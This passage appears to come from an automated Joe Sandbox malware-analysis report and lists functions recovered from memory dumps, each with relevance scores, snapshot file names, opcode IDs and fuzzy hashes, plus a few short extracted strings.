                                                                                    • Instruction Fuzzy Hash: 27C19274E00218CFEB54DFA5C954B9DBBB2FF89300F1081A9D809AB3A5DB355A85CF60
                                                                                    Function 0670C690 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a5ddd457992131b41331681660596517418ff6631363ac26bb3b77b770aeb0a
                                                                                    • Instruction ID: 11a50176b2f8ff0b2847ec89400adc68209ed7ce8c830254cf12b286a6c8d03c
                                                                                    • Opcode Fuzzy Hash: 6a5ddd457992131b41331681660596517418ff6631363ac26bb3b77b770aeb0a
                                                                                    • Instruction Fuzzy Hash: A2C18274E00218CFEB55DFA5C954B9DBBB2FF89300F1081A9D409AB395DB355A85CF60
                                                                                    Function 0670CF40 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b459584b93f7e168f3974a90a9fdcd5e2033c8d2170d1d6524bebf22ccd9380c
                                                                                    • Instruction ID: 3d1e32400da0cdcbcc2053b971a70fe921c04859ace6453701da99bb7ff095c5
                                                                                    • Opcode Fuzzy Hash: b459584b93f7e168f3974a90a9fdcd5e2033c8d2170d1d6524bebf22ccd9380c
                                                                                    • Instruction Fuzzy Hash: 52C18174E01218CFEB54DFA5C954B9DBBB2FF89300F1081A9D409AB3A5DB359A85CF60
                                                                                    Function 0670D7F0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee3890a6431ca8176590c65dfd05eca4a68a72d18490a2ceb8f294b7b0e6128a
                                                                                    • Instruction ID: 1832d4ea48e4e00a9ba2ac4d88c7591cc7b1b4d2f663775b3953e161e1035e8f
                                                                                    • Opcode Fuzzy Hash: ee3890a6431ca8176590c65dfd05eca4a68a72d18490a2ceb8f294b7b0e6128a
                                                                                    • Instruction Fuzzy Hash: CFC18274E00218CFEB54DFA5C954B9DBBB2EF89300F1081A9D409AB3A5DB355E85CF60
                                                                                    Function 0670D398 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee4e9c310c4aac1398d88174aba2de5290b632d8b960b8a32db5747d54e1c557
                                                                                    • Instruction ID: 59554d83f9df5c875f759d066463a4a3e465364866115d2dab79d764bea59af9
                                                                                    • Opcode Fuzzy Hash: ee4e9c310c4aac1398d88174aba2de5290b632d8b960b8a32db5747d54e1c557
                                                                                    • Instruction Fuzzy Hash: 2BC18174E00218CFEB54DFA5C954B9DBBB2FF89300F1081A9D419AB3A5DB359A85CF60
                                                                                    Function 0670DC48 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de5f021db9ecdfa53f63d2ab2fcda8ab3ce84f2c14adcb492eb1170450f17b8e
                                                                                    • Instruction ID: 3acfad40dc67bc981141c72e89ac76387d488554c4c35e551ffe2f304b798027
                                                                                    • Opcode Fuzzy Hash: de5f021db9ecdfa53f63d2ab2fcda8ab3ce84f2c14adcb492eb1170450f17b8e
                                                                                    • Instruction Fuzzy Hash: B6C19274E01218CFEB54DFA5C954B9DBBB2FF89300F2081A9D409AB3A5DB355A85CF60
                                                                                    Function 0670E4F8 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 972a9491ddc96d112c37d6df036f509d57db16f7f6622a0a3377d421e1757cbb
                                                                                    • Instruction ID: 24997d69abb9b94dfe851e094e76ded1b1c6faec63e6aa00364fb85f4b538c3d
                                                                                    • Opcode Fuzzy Hash: 972a9491ddc96d112c37d6df036f509d57db16f7f6622a0a3377d421e1757cbb
                                                                                    • Instruction Fuzzy Hash: 52C19174E01218CFEB54DFA5C954B9DBBB2FF89300F1081A9D409AB3A5DB359A85CF60
                                                                                    Function 0670E0A0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 05f568c018610a4bb1b17b0984c603fd0ad39facc590a6b4a81e83f2cdc4702f
                                                                                    • Instruction ID: 82ab6b466d7f00b8e6fe5a6df3a5ceb327e25b2986696529f53609fc98af4232
                                                                                    • Opcode Fuzzy Hash: 05f568c018610a4bb1b17b0984c603fd0ad39facc590a6b4a81e83f2cdc4702f
                                                                                    • Instruction Fuzzy Hash: 3BC18174E00218CFEB54DFA5C954B9DBBB2FF89300F1081A9D419AB3A5DB359A85CF60
                                                                                    Function 0670BDE0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 71e571f889ccb40ff4c00818b033c5a5d35db5df895306869c3285ea11d5736f
                                                                                    • Instruction ID: 49da00d4f92646e2796e3949ec8ed716365d00fa0289187c8d15a75b6b7ca3d0
                                                                                    • Opcode Fuzzy Hash: 71e571f889ccb40ff4c00818b033c5a5d35db5df895306869c3285ea11d5736f
                                                                                    • Instruction Fuzzy Hash: C3C1A174E00218CFEB55DFA5C954B9DBBB2EF89300F1081A9D409AB3A5DB359A85CF60
                                                                                    Function 0670EDA8 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 79a9dbb5d8a93b6119830013e97c546ac81e0a89fd53c41571b8eb28ecb8c9bc
                                                                                    • Instruction ID: c1408598c2ddb7b37917a9e8a03cbaf4485aae9cdb12d1d4d7ec11514c598fdf
                                                                                    • Opcode Fuzzy Hash: 79a9dbb5d8a93b6119830013e97c546ac81e0a89fd53c41571b8eb28ecb8c9bc
                                                                                    • Instruction Fuzzy Hash: 4EC19174E00218CFEB54DFA5C954B9DBBB2EF89300F1081A9D419AB3A5DB359A85CF60
                                                                                    Function 06704159 Relevance: .2, Instructions: 225COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c41286b6422ce1c76ab4be0e6f489f058198c837a461fe02c855e64a8cd59c26
                                                                                    • Instruction ID: 4955200a9ecc6cfef01b96b4aee2233a643f4c499119cbd35a3c9928a0436df9
                                                                                    • Opcode Fuzzy Hash: c41286b6422ce1c76ab4be0e6f489f058198c837a461fe02c855e64a8cd59c26
                                                                                    • Instruction Fuzzy Hash: 67A12575D10619DEEB14DFA9C8447ADFBF1EF89300F10C2AAE448A7265EB709A81CF51
                                                                                    Function 06700673 Relevance: .2, Instructions: 193COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2fdc1f90e69dcaa6c5174ff5487ed5a18706b5ed6f9d2bfb75f632b8b7a062e2
                                                                                    • Instruction ID: 5684f20f7604d42a4b33287d1ebebd8b48b5a79b7343f5bed0547a591fccd858
                                                                                    • Opcode Fuzzy Hash: 2fdc1f90e69dcaa6c5174ff5487ed5a18706b5ed6f9d2bfb75f632b8b7a062e2
                                                                                    • Instruction Fuzzy Hash: E4A19E74E01228CFEB65DF24C854BA9BBB2BF89311F1085EAD409A7390DB319E81CF51
                                                                                    Function 06700853 Relevance: .1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: be469af6dec1479ffc799efec9b2b0515a68b26ae0c4d9bd6b5e2f04570ed257
                                                                                    • Instruction ID: f9e3ee94c9827e1f724278d91629860a13d18f0196ce6fa2682ee56fc018264f
                                                                                    • Opcode Fuzzy Hash: be469af6dec1479ffc799efec9b2b0515a68b26ae0c4d9bd6b5e2f04570ed257
                                                                                    • Instruction Fuzzy Hash: 4B519374A05228CFDB65DF24C854BA9B7B2FF4A311F5095E9D40AA7364CB319E81CF50
                                                                                    Function 0670CF31 Relevance: .1, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bc63f3ac9f038f0cb6d53765e12c2952743492c564cf2c81d7ab9bde8a1759ed
                                                                                    • Instruction ID: 696f2e417bf851253d17fe6eb464fa58c8d3e5846417c82b390ff5dea2469623
                                                                                    • Opcode Fuzzy Hash: bc63f3ac9f038f0cb6d53765e12c2952743492c564cf2c81d7ab9bde8a1759ed
                                                                                    • Instruction Fuzzy Hash: 79412375D04208CBEB58CFAAD8446AEFBF2AF88300F20C029C018BB294DB345946CF64
                                                                                    Function 0670FAA0 Relevance: .1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13f32640140d6533b723dec78791c28e23ee74d3fc6c629789818ac5cb24c493
                                                                                    • Instruction ID: c860b0911aa37f0c1135a8037fff9d98cf6e64301b17c9815e63926a26c44c8a
                                                                                    • Opcode Fuzzy Hash: 13f32640140d6533b723dec78791c28e23ee74d3fc6c629789818ac5cb24c493
                                                                                    • Instruction Fuzzy Hash: 6141E4B5D00208CBEB58DFAAD9546EEBBF2AF89300F24C129C415BB295DB385945CF64
                                                                                    Function 0670E4E8 Relevance: .1, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 802892ee1137049837e112c53ec8237a2f56a6c9dfc9312ec3638981e7296220
                                                                                    • Instruction ID: f7af15ebd341d62a826b916829b005a735a66b525d4f2094db60b4c88f7ee471
                                                                                    • Opcode Fuzzy Hash: 802892ee1137049837e112c53ec8237a2f56a6c9dfc9312ec3638981e7296220
                                                                                    • Instruction Fuzzy Hash: 75410675E00208CFEB58DFAAD95469EFBF2AF89300F20D529C414BB295EB345946CF60
                                                                                    Function 0670F1F0 Relevance: .1, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 37167b4fb4bdafd2684de3e788a2eb7ac3477d1993e4665627b438e98ed32519
                                                                                    • Instruction ID: 5f59196de4c18f3954663a156ab56ba209dae1615425a566ca3a304a6eba83a6
                                                                                    • Opcode Fuzzy Hash: 37167b4fb4bdafd2684de3e788a2eb7ac3477d1993e4665627b438e98ed32519
                                                                                    • Instruction Fuzzy Hash: F741F775D00248CFEB58DFAAD95469DBBF2AF89300F24C12AC414BB294DB385945CF50
                                                                                    Function 0670BDCF Relevance: .1, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fded45beacc657185d0c28478c57de487354279a59390e0f9f56279f965faec
                                                                                    • Instruction ID: 7dbeaa54b894e095dd87d0f13ade1fd9041ba53bdcf4a107c6f10a50ffc8611c
                                                                                    • Opcode Fuzzy Hash: 0fded45beacc657185d0c28478c57de487354279a59390e0f9f56279f965faec
                                                                                    • Instruction Fuzzy Hash: C74115B5D01208CFEB58CFAAC95479DBBF2AF89300F64C129C418BB294EB345945CF60
                                                                                    Function 0670F649 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6edd1dfd6b1c654401fa2e838285ed93324d9e43a8ed3479a1ba9d9bdfde7b51
                                                                                    • Instruction ID: 6d2d685e29315901b9a1bcde5ca686f3300cafc371ad9de5d1672bf67f5ce759
                                                                                    • Opcode Fuzzy Hash: 6edd1dfd6b1c654401fa2e838285ed93324d9e43a8ed3479a1ba9d9bdfde7b51
                                                                                    • Instruction Fuzzy Hash: 81410671D00248CFEB58DFAAD95469DBBF2AF89300F64C129C418BB295DB385946CF64
                                                                                    Function 0670CAD9 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c04b3ba731b9d87a27240da44f5241eb89c19d32462761d05f8e8dbc776d81d
                                                                                    • Instruction ID: 884050ecbe74d57904378c4753a6c29e77dca256b62f8978a2ce74d65fc9a9ab
                                                                                    • Opcode Fuzzy Hash: 1c04b3ba731b9d87a27240da44f5241eb89c19d32462761d05f8e8dbc776d81d
                                                                                    • Instruction Fuzzy Hash: 86411475E00208CFEB58DFAAC85469EBBF2AF89300F24C129C415BB294DB345946CF60
                                                                                    Function 0670C680 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0471414c1a945a70abb1de284eb427dbdbc418bd8355bfc92658299ec00c7f14
                                                                                    • Instruction ID: ae64872418eaa3ddcd61a1ddd3705a3cc44176dde577316e1dd7c54c0d64cc1e
                                                                                    • Opcode Fuzzy Hash: 0471414c1a945a70abb1de284eb427dbdbc418bd8355bfc92658299ec00c7f14
                                                                                    • Instruction Fuzzy Hash: ED41F5B5D01208CFEB58CFAAD9546EDBBF2AF89300F60C12AC415BB295DB355946CF60
                                                                                    Function 0670DC38 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0267d4382ac8ecd90655cbeca65633c9828aee5f07a2063c842389da537c00cc
                                                                                    • Instruction ID: 5de2c8781c27092f53ba67988bf034d60bb93c66db6aee018d8d064b7a2007e7
                                                                                    • Opcode Fuzzy Hash: 0267d4382ac8ecd90655cbeca65633c9828aee5f07a2063c842389da537c00cc
                                                                                    • Instruction Fuzzy Hash: 29410675D05208CFEB58CFEAD9546ADBBF2AF89300F60C12AC418BB294DB345946CF50
                                                                                    Function 0670E091 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cb8f9d621f0847980c51ee7775b004201f9bbe9650ea616117151dda355f7fa0
                                                                                    • Instruction ID: 053989d90508c528e0635b7ef687ec0494a84a9abbfb90856f599a56d3b5e7db
                                                                                    • Opcode Fuzzy Hash: cb8f9d621f0847980c51ee7775b004201f9bbe9650ea616117151dda355f7fa0
                                                                                    • Instruction Fuzzy Hash: 0A411371E00208DFEB58DFAAC8547ADBBF2AF89300F64C529D418BB294DB345946CF60
                                                                                    Function 0670ED99 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c35afbf81453f6073d401c5b9ca515c1c41b7258cd5e833c7bbd72d3b317e8a1
                                                                                    • Instruction ID: 68ff7a7c121f713a4adb261293a29d580bec91d602323891a156de2ab5b02302
                                                                                    • Opcode Fuzzy Hash: c35afbf81453f6073d401c5b9ca515c1c41b7258cd5e833c7bbd72d3b317e8a1
                                                                                    • Instruction Fuzzy Hash: 8E4106B1D00208DBEB58DFAAC85479DFBF2AF89300F64C129C414BB294DB385946CF64
                                                                                    Function 0670D38A Relevance: .1, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ace5d69a0efc7d541ec91d8149fc2099447e004bb027bbf89abfca57d214fba
                                                                                    • Instruction ID: d9b8fd67c48854dfa20d9eede980e2c6cde3965a3c21e861d5a830604fe04897
                                                                                    • Opcode Fuzzy Hash: 6ace5d69a0efc7d541ec91d8149fc2099447e004bb027bbf89abfca57d214fba
                                                                                    • Instruction Fuzzy Hash: 4941E275E00208CFEB58DFEAD95469DBBF2AF89300F24D029D418AB295DB345945CF60
                                                                                    Function 0670CF3F Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ae99c4114c8cbf8e921e93b8c35a5148a382b28fcb109ae27976e11953a4e2e
                                                                                    • Instruction ID: b11bfa4ad4b150243333013b01a5f8dcaf28c8751c0a7dd4e893f57b6a140f52
                                                                                    • Opcode Fuzzy Hash: 5ae99c4114c8cbf8e921e93b8c35a5148a382b28fcb109ae27976e11953a4e2e
                                                                                    • Instruction Fuzzy Hash: B641D374D05208CFEB58DFAAD9546AEBBF2AF89300F20C129C419BB295DB345946CF64
                                                                                    Function 0670D7EF Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ce1106064b34ba2aaee6d8357aac3b66f24eb35c687e777da4dcf0b9cd0ca48
                                                                                    • Instruction ID: af663eb0a322445510c743dde8ac2b79b281d0581fa85528cb48c69db5f5a815
                                                                                    • Opcode Fuzzy Hash: 6ce1106064b34ba2aaee6d8357aac3b66f24eb35c687e777da4dcf0b9cd0ca48
                                                                                    • Instruction Fuzzy Hash: 6041E274D01208CFEB58DFEAD9546AEBBF2AF89300F20C129C419BB294DB345945CF64
                                                                                    Function 00EC2A69 Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Xq$Xq$Xq$Xq
                                                                                    • API String ID: 0-3965792415
                                                                                    • Opcode ID: 4eb1561516d6da002584bade946373a8d6aa4ecb810ca7c6242f9c1ba8c6ef0c
                                                                                    • Instruction ID: 5ab6d0d4a788566be7e69ad1268bd6c49459100bdc11a1f0cf55f75d463e105d
                                                                                    • Opcode Fuzzy Hash: 4eb1561516d6da002584bade946373a8d6aa4ecb810ca7c6242f9c1ba8c6ef0c
                                                                                    • Instruction Fuzzy Hash: 20319630D003198BDF74CBA48A81BAEB7B6AB94304F14516DC519B7341DB32CE47CB92
                                                                                    Function 00EC6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \;q$\;q$\;q$\;q
                                                                                    • API String ID: 0-2933265366
                                                                                    • Opcode ID: d2a829f085e61e1290d108f32ed70d568d196787903eeae00b9951171d12b7e7
                                                                                    • Instruction ID: 3cddfc8f2bb0164329b05b8c5f1b242e3de71ece15c7192326dca61b9ad25622
                                                                                    • Opcode Fuzzy Hash: d2a829f085e61e1290d108f32ed70d568d196787903eeae00b9951171d12b7e7
                                                                                    • Instruction Fuzzy Hash: 1B0184317001158FC7248A2DC640F2777E6AFC8768729616EE806EB370DA32EC438751